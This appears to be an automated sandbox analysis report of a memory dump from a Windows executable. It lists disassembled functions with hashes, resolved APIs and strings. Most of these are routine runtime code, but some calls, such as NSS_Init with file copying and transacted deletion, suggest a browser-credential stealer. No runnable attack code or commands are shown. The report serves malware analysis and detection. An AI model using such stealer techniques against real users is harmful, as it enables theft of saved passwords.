Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: c3aab38918c7873fd4768865c8b6e233830284a59fd2150a8ef8bef3ba9ecbe3
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: FE1108772401C183F6048ABDC4F4AB7A395EAC536D72C42BBD3414F758D13AF965950C

Uniqueness

Uniqueness Score: -1.00%

Function 0043A492, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a714770d643b9cfe08e9b086170367a8b311287801241f4c2e7fb05fb85fa1
Instruction ID: f0fa1824911106b33fba65c6671e370cbc677e7234c6642a87c3a2193e379274
Opcode Fuzzy Hash: 38a714770d643b9cfe08e9b086170367a8b311287801241f4c2e7fb05fb85fa1
Instruction Fuzzy Hash: 472124755240B15A861C8A3EAC61477BBD0DB4B20238B42BBE9CBE90C2C52ED975D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0043CF48, Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0043CF4E
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0043CF5C
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0043CF6D
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0043CF7E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0043CF8F
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0043CFA0
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0043CFB1
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0043CFC2
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0043CFD3
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0043CFE4
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043CFF5
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0043D006
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0043D017
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0043D028
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0043D039
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0043D04A
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0043D05B
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0043D06C
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0043D07D
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0043D08E
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0043D09F
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0043D0B0
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0043D0C1
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0043D0D2
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0043D0E3
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0043D0F4
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0043D105
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0043D116
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0043D127
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0043D138
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0043D149
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0043D15A
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0043D16B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0043D17C
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0043D18D
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0043D19E
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0043D1AF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0043D1C0
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0043D1D1
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0043D1E2
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0043D1F3

Strings

CompareStringEx, xrefs: 0043D1C6
SetThreadpoolWait, xrefs: 0043D03F
CreateEventExW, xrefs: 0043CFB7
InitializeSRWLock, xrefs: 0043D13E
CloseThreadpoolWait, xrefs: 0043D050
GetCurrentPackageId, xrefs: 0043D0A5
CreateSymbolicLinkW, xrefs: 0043D099
FlsSetValue, xrefs: 0043CF84
CreateSemaphoreW, xrefs: 0043CFC8
FlsFree, xrefs: 0043CF62
CloseThreadpoolWork, xrefs: 0043D1B5
FlsGetValue, xrefs: 0043CF73
WaitForThreadpoolTimerCallbacks, xrefs: 0043D00C
ReleaseSRWLockExclusive, xrefs: 0043D171
FlsAlloc, xrefs: 0043CF56
AcquireSRWLockExclusive, xrefs: 0043D14F
SetFileInformationByHandle, xrefs: 0043D0D8
GetSystemTimePreciseAsFileTime, xrefs: 0043D0E9
SleepConditionVariableSRW, xrefs: 0043D182
TryAcquireSRWLockExclusive, xrefs: 0043D160
CreateThreadpoolWait, xrefs: 0043D02E
CloseThreadpoolTimer, xrefs: 0043D01D
CreateSemaphoreExW, xrefs: 0043CFD9
GetCurrentProcessorNumber, xrefs: 0043D083
SleepConditionVariableCS, xrefs: 0043D12D
CreateThreadpoolWork, xrefs: 0043D193
kernel32.dll, xrefs: 0043CF49
WakeConditionVariable, xrefs: 0043D10B
InitializeConditionVariable, xrefs: 0043D0FA
InitOnceExecuteOnce, xrefs: 0043CFA6
GetFileInformationByHandleEx, xrefs: 0043D0C7
InitializeCriticalSectionEx, xrefs: 0043CF95
FreeLibraryWhenCallbackReturns, xrefs: 0043D072
WakeAllConditionVariable, xrefs: 0043D11C
GetTickCount64, xrefs: 0043D0B6
SetThreadpoolTimer, xrefs: 0043CFFB
CreateThreadpoolTimer, xrefs: 0043CFEA
SubmitThreadpoolWork, xrefs: 0043D1A4
GetLocaleInfoEx, xrefs: 0043D1D7
LCMapStringEx, xrefs: 0043D1E8
FlushProcessWriteBuffers, xrefs: 0043D061

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: efeaa618fffa79f74ebb3a6227de566b5332c7d8154a34b82d6867f1b33181ff
Instruction ID: 6ea0df524e35e5b510af01c1738261bf4274b18a6bcfbf39a04781b182b1ef00
Opcode Fuzzy Hash: efeaa618fffa79f74ebb3a6227de566b5332c7d8154a34b82d6867f1b33181ff
Instruction Fuzzy Hash: E8610671951750BFEB006FB5AC4D9C93AA9EB0A706710493BF601E2560FBF850A08F9F

Uniqueness

Uniqueness Score: -1.00%

Function 004588BB, Relevance: 25.9, APIs: 17, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 004588E5
_free.LIBCMT ref: 004589BE
_free.LIBCMT ref: 004589EB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 75777c648ca23e67883a79795551d9355426dc0162c537e9236774bade84c787
Instruction ID: 0c1e752cc1f787ef3cf523d1d53bc9ceaa0836e15e07d5684ed00bf695e96720
Opcode Fuzzy Hash: 75777c648ca23e67883a79795551d9355426dc0162c537e9236774bade84c787
Instruction Fuzzy Hash: 46D104B1900700AFDB21AF659882A6F77B4EF00756B04456FED15A7383EE3D9D0C8B99

Uniqueness

Uniqueness Score: -1.00%

Function 0045EA92, Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 374COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045EADA
_free.LIBCMT ref: 0045EAFE
_free.LIBCMT ref: 0045EB0B
_free.LIBCMT ref: 0045EB30
_free.LIBCMT ref: 0045EB3D
_free.LIBCMT ref: 0045EB46
_free.LIBCMT ref: 0045EE21
_free.LIBCMT ref: 0045EE29

Strings

TaH, xrefs: 0045EAC0, 0045EDA6

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID: TaH
API String ID: 269201875-2417347642
Opcode ID: 6c4ddcbdd47d889d28cb29831bf8bd30135e0a023ea57bd310dade0d39418a96
Instruction ID: e0e751b8247ed3e08b5d1ff8ce72b33e3d14f6d6bd3dee61305b76d3484438f2
Opcode Fuzzy Hash: 6c4ddcbdd47d889d28cb29831bf8bd30135e0a023ea57bd310dade0d39418a96
Instruction Fuzzy Hash: ACC15671D00209AFDB20DBA9CC42FEE77F8AB09719F140056FE05EB383D6749A5587A9

Uniqueness

Uniqueness Score: -1.00%

Function 0044C723, Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 403COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044C7C9
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044C7ED

Strings

File: , xrefs: 0044C893
(Press Retry to debug the application - JIT must be enabled), xrefs: 0044CB56
For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0044CB2C
..., xrefs: 0044C848, 0044C967, 0044C9B9, 0044CAFD, 0044CB80, 0044CBB3
Assertion failed!, xrefs: 0044C747
Expression: , xrefs: 0044CA83
<program name unknown>, xrefs: 0044C7F7
Line: , xrefs: 0044CA09
Program: , xrefs: 0044C78B

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Module$FileHandleName
String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
API String ID: 4146042529-1508414584
Opcode ID: 32bc0692a7cc813812836568689447a6f3b6b92115ccbcbfd3f6718d403fa329
Instruction ID: 2247f5487d81e29bfabb7fa6bab4432b1b2ecfe6fd7a3fcce0959cb58c2dafd6
Opcode Fuzzy Hash: 32bc0692a7cc813812836568689447a6f3b6b92115ccbcbfd3f6718d403fa329
Instruction Fuzzy Hash: EAC11C75A0114566EB606A25EC8AFBB3268DF65708F0804ABFC05E2347F738EE45C59D

Uniqueness

Uniqueness Score: -1.00%

Function 0045EEB2, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 200COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045EF20
_free.LIBCMT ref: 0045EF2C
_free.LIBCMT ref: 0045F055
_free.LIBCMT ref: 0045F060

Strings

TaH, xrefs: 0045EEDD, 0045F095
XaH, xrefs: 0045F0AC

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID: TaH$XaH
API String ID: 269201875-2831354248
Opcode ID: ddd8fa25d65f6412a2254daf8b6774088ade54a1951d4fb0870aeab08fc0d85c
Instruction ID: bd9c87b533eb7e1fc617aad5b172df43b7d1b4268dc2defcb481aa8d918f6151
Opcode Fuzzy Hash: ddd8fa25d65f6412a2254daf8b6774088ade54a1951d4fb0870aeab08fc0d85c
Instruction Fuzzy Hash: 5261F3729007019FDB20DF65D841BAB77F8AB04B16F14042FEC51AB383EB349D098B55

Uniqueness

Uniqueness Score: -1.00%

Function 0043A6F9, Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000001,?,00000001,00DB6F70,00000000), ref: 0043A70D
GetFileSize.KERNEL32(00DB6FD8,00000000), ref: 0043A78D
SetFilePointer.KERNEL32(00DB6FD8,00000000,00000000,00000000), ref: 0043A7A4
ReadFile.KERNEL32(00DB6FD8,00DB6FD8,00000002,00DB6FE0,00000000), ref: 0043A7B7
SetFilePointer.KERNEL32(00DB6FD8,00000024,00000000,00000000), ref: 0043A7C4
ReadFile.KERNEL32(00DB6FD8,00DB6FC0,00000004,00DB6FE0,00000000), ref: 0043A7D7
SetFilePointer.KERNEL32(00DB6FD8,00DB6FC0,00000000,00000000), ref: 0043A7F8
ReadFile.KERNEL32(00DB6FD8,0043ABB9,00000004,00DB6FE0,00000000), ref: 0043A80B

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: 33c9b64bcc09fd42cb497482ad631428a2d2c7ca53691dcff5fed853e036cc87
Instruction ID: 398be57f3022a1f413b083a9bb68a379531f273f71114cc8014a95dbe072906c
Opcode Fuzzy Hash: 33c9b64bcc09fd42cb497482ad631428a2d2c7ca53691dcff5fed853e036cc87
Instruction Fuzzy Hash: 26518375A40218BFEB28DF68CC95BBF77B9EB48700F14542AF942E7280D674DD018B56

Uniqueness

Uniqueness Score: -1.00%

Function 00454D93, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00454DA9

Part of subcall function 00455CC3: RtlFreeHeap.NTDLL(00000000,00000000,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?), ref: 00455CD9
Part of subcall function 00455CC3: GetLastError.KERNEL32(?,?,0045F0EB,?,00000000,?,00000002,?,0045F38E,?,00000007,?,?,0045F78F,?,?), ref: 00455CEB

_free.LIBCMT ref: 00454DB5
_free.LIBCMT ref: 00454DC0
_free.LIBCMT ref: 00454DCB
_free.LIBCMT ref: 00454DD6
_free.LIBCMT ref: 00454DE1
_free.LIBCMT ref: 00454DEC
_free.LIBCMT ref: 00454DF7
_free.LIBCMT ref: 00454E02
_free.LIBCMT ref: 00454E10

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e1838c7f8ce0478565ec448da272903010157b53003c8f499937327aadf06f2d
Instruction ID: 2d9660c377662293307e07f6408c828e8a8d3423a9f62d824f228a20f733546f
Opcode Fuzzy Hash: e1838c7f8ce0478565ec448da272903010157b53003c8f499937327aadf06f2d
Instruction Fuzzy Hash: FF210C76900608AFCB42EF95D891DDD7BB4BF08745F00446AF9159B222DB75DA48CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0043A5E4, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 79COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0043A5E9

Strings

.zip, xrefs: 0043A61C
.arj, xrefs: 0043A660
.zoo, xrefs: 0043A62D
.gz, xrefs: 0043A671
.arc, xrefs: 0043A63E
.tgz, xrefs: 0043A682
.lzh, xrefs: 0043A64F

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 4218353326-51310709
Opcode ID: ecadda73e8444c468cd92158ede6ee5af4dfe7df6b25e7cca4974f7a76adeefd
Instruction ID: 0ca22a4ad449c64141cc37cd6059182a9f0b1de6dc7c5c16f0dc601c1e3d7138
Opcode Fuzzy Hash: ecadda73e8444c468cd92158ede6ee5af4dfe7df6b25e7cca4974f7a76adeefd
Instruction Fuzzy Hash: DD115826288B53783626E116E853BAB07CC9F07735B38142FE8CC541C1EE4DA995406F

Uniqueness

Uniqueness Score: -1.00%

Function 004280A4, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004280A9
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004281B3
CloseHandle.KERNEL32(00000000), ref: 004281C1
GetFileSize.KERNEL32(00000000,00000000), ref: 00428206
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042822F
CloseHandle.KERNEL32(00000000), ref: 00428236

Part of subcall function 0040BF84: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,?,?,?,?,00000000,00000000,?), ref: 0040BF97
Part of subcall function 0040BF84: DeleteFileTransactedA.KERNEL32 ref: 0040BFAE
Part of subcall function 0040BF84: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,00000000,00000000,?,?,?,004184D2,00000012,00000000), ref: 0040BFB9

Strings

QU], xrefs: 0042829B

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
String ID: QU]
API String ID: 604483397-1076435405
Opcode ID: a698eae528464c874d20aee16328ae8ff8ca7f4bde66268844ce6d6b1b26feb6
Instruction ID: 3288464f983a39f621fef4bf08b8e684ff100162a7bfcc56a2a5ecfe133a378f
Opcode Fuzzy Hash: a698eae528464c874d20aee16328ae8ff8ca7f4bde66268844ce6d6b1b26feb6
Instruction Fuzzy Hash: A191F430D01258DFDF11EBA5D981BEEBBB4AF15304F6041AEE441B7282DB781B49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00425077, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042507C

Strings

not keep_stack.empty(), xrefs: 0042509D
object_element, xrefs: 004251C9
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042508C, 0042509C, 00425141, 00425182, 004251C4
not key_keep_stack.empty(), xrefs: 00425183
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 00425142

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: a736c848fd286efd423aefa2de9b6c106c5bdbaad2ff4a40c6addd19a37cbe5e
Instruction ID: ac560b1479239aa98356ccb53c549499bd17d0982837133f283a1b075bf11fa7
Opcode Fuzzy Hash: a736c848fd286efd423aefa2de9b6c106c5bdbaad2ff4a40c6addd19a37cbe5e
Instruction Fuzzy Hash: 52510230B002149FCB04DF54D492BEABBB1FF55314F84809EE8099F392DB78A954CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00440EA0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00440ED7
___except_validate_context_record.LIBVCRUNTIME ref: 00440EDF
_ValidateLocalCookies.LIBCMT ref: 00440F68
__IsNonwritableInCurrentImage.LIBCMT ref: 00440F93
_ValidateLocalCookies.LIBCMT ref: 00440FE8

Strings

csm, xrefs: 00440F7D

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 44c7562d9574d1c5042a06caa80c869e4fca4bcf244c6660a97ccbe470cceac4
Instruction ID: fb313deea884ca069f36e4e28ceafdbd914b3a1e8fe7b16a4f93e540ee4a93a3
Opcode Fuzzy Hash: 44c7562d9574d1c5042a06caa80c869e4fca4bcf244c6660a97ccbe470cceac4
Instruction Fuzzy Hash: 8341EA34E00208DBDF20DF69C840A9EBBB1BF45318F14806BF9145B352D7B9A925CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00456454, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 004564BF
api-ms-, xrefs: 004564AB

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 04ef15f02f3086ad0261fdd332b31fa6ddba8ed9a993d8becedaf392117ead97
Instruction ID: ac127ff9488a8770a7fe59c0e49c87f558e7966660f97506e94293d5c10486e7
Opcode Fuzzy Hash: 04ef15f02f3086ad0261fdd332b31fa6ddba8ed9a993d8becedaf392117ead97
Instruction Fuzzy Hash: FF21E771A41224FBCB318B659C40A1B37589F02B76F630522EC15B7392F638ED19CADE

Uniqueness

Uniqueness Score: -1.00%

Function 00424208, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042420D

Strings

cannot get value, xrefs: 004242A4
m_it.array_iterator != m_object->m_value.array->end(), xrefs: 0042425F
A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00424219, 00424229, 0042425E, 00424282
m_object != nullptr, xrefs: 0042422A
m_it.object_iterator != m_object->m_value.object->end(), xrefs: 00424283

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$cannot get value$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
API String ID: 3519838083-3858235212
Opcode ID: 08731dfe23daa6bc49f84e1126f1e91c341ea77d2cec0f6dcd0025c86f1e5ef1
Instruction ID: 0af369c51fe7e7f22eef9c92e8126d7e11b306bf146a23fb4707f99231d85504
Opcode Fuzzy Hash: 08731dfe23daa6bc49f84e1126f1e91c341ea77d2cec0f6dcd0025c86f1e5ef1
Instruction Fuzzy Hash: E421F330B00200CBD714DB8AE885EEAB7F4EF84714F54806FF44997292E76CA940CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 0044CCB0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,A:\_Work\rc-build-v1-exe\json.hpp,?,?), ref: 0044CCD0
GetFileType.KERNEL32(00000000), ref: 0044CCE2
swprintf.LIBCMT ref: 0044CD03
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0044CD40

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0044CCCA
Assertion failed: %Ts, file %Ts, line %d, xrefs: 0044CCF8

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: A:\_Work\rc-build-v1-exe\json.hpp$Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-3717751166
Opcode ID: 1b3b759ce5f7158f52be6a31df23b142a094ec44d74469cfe27d7ad868aaa7d4
Instruction ID: 664376ba35dfabf7766ab0ac1c8d4cb511749f45c0043766ff1549a95ae3664a
Opcode Fuzzy Hash: 1b3b759ce5f7158f52be6a31df23b142a094ec44d74469cfe27d7ad868aaa7d4
Instruction Fuzzy Hash: CD119BB1800008ABDB209F29CC85AEF7BACEF45310F14457AFA1AA7180EA349D418B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00432C40, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00432C4A
_strlen.LIBCMT ref: 00432C5F
_strcat.LIBCMT ref: 00432C82
_strlen.LIBCMT ref: 00432C88
_strcat.LIBCMT ref: 00432C9C
_strlen.LIBCMT ref: 00432CA2

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strlen$_strcat
String ID:
API String ID: 1497175149-0
Opcode ID: e7bce024ed4082ee21bd2144cb7616dfe6e33304a869f7e1c5383a34198608ee
Instruction ID: 8aeeb2581336e6b0ac4ee04985d85fe3983cd670e981c50ce136d2d09be0e9a7
Opcode Fuzzy Hash: e7bce024ed4082ee21bd2144cb7616dfe6e33304a869f7e1c5383a34198608ee
Instruction Fuzzy Hash: 41019236500204BBEF15EF6ADC8199F7769DE88364724541EFD0867203E779EE0586A8

Uniqueness

Uniqueness Score: -1.00%

Function 004203B9, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?), ref: 0041FE8D

Part of subcall function 00412716: _Deallocate.LIBCONCRT ref: 00412725

Part of subcall function 0040B9A6: ___std_fs_copy_file@12.LIBCPMT ref: 0040B9CA

Part of subcall function 004124F9: _Deallocate.LIBCONCRT ref: 0041250E

NSS_Shutdown.NSS3(?,00000001,?,?,?), ref: 00420394

Strings

[GE[, xrefs: 004200F8
?jms, xrefs: 00420223
K, xrefs: 00420110
k, xrefs: 004201EA

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate$InitShutdown___std_fs_copy_file@12
String ID: ?jms$K$[GE[$k
API String ID: 967476354-2416919435
Opcode ID: 4289e48d93e42837b2fba67df7f6cfea8d084c9d1fedbd5d7020e1a72107bf7e
Instruction ID: 59d709b36b15c942037e6d489be84455537b27943621a2a261f4c6de879f0156
Opcode Fuzzy Hash: 4289e48d93e42837b2fba67df7f6cfea8d084c9d1fedbd5d7020e1a72107bf7e
Instruction Fuzzy Hash: 67C1AC30D042A8CAEF15DBA4D941BEDBBB0AF69304F1041EED84977252EB741BC9CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00444C71, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00444D0C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00444E07
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00444E1C

Strings

FLD, xrefs: 00444CDD, 00444DD8
FLD, xrefs: 00444E12

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: FLD$FLD
API String ID: 885266447-426043192
Opcode ID: 141a3c880d0ca73719465be396a893ab4e5c95a7e419b4f8beb73208370c0dcd
Instruction ID: fd95c62d4ead054f05e8c3c59c8ca4e8b625705f2d490fd68c537fe0f1d0b65b
Opcode Fuzzy Hash: 141a3c880d0ca73719465be396a893ab4e5c95a7e419b4f8beb73208370c0dcd
Instruction Fuzzy Hash: 9A51D3B0E00209AFDF14DF98CC91EAE7BB2EF89314F14851AE955AB352D3389D41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00432714, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,74B069A0), ref: 00432745
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74B069A0), ref: 00432764
lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,74B069A0), ref: 00432787
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,KsG,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74B069A0), ref: 004327B3

Strings

KsG, xrefs: 004327AA, 0043274F, 0043275D

Memory Dump Source

Source File: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$lstrcpylstrlen
String ID: KsG
API String ID: 3705784190-1864647989
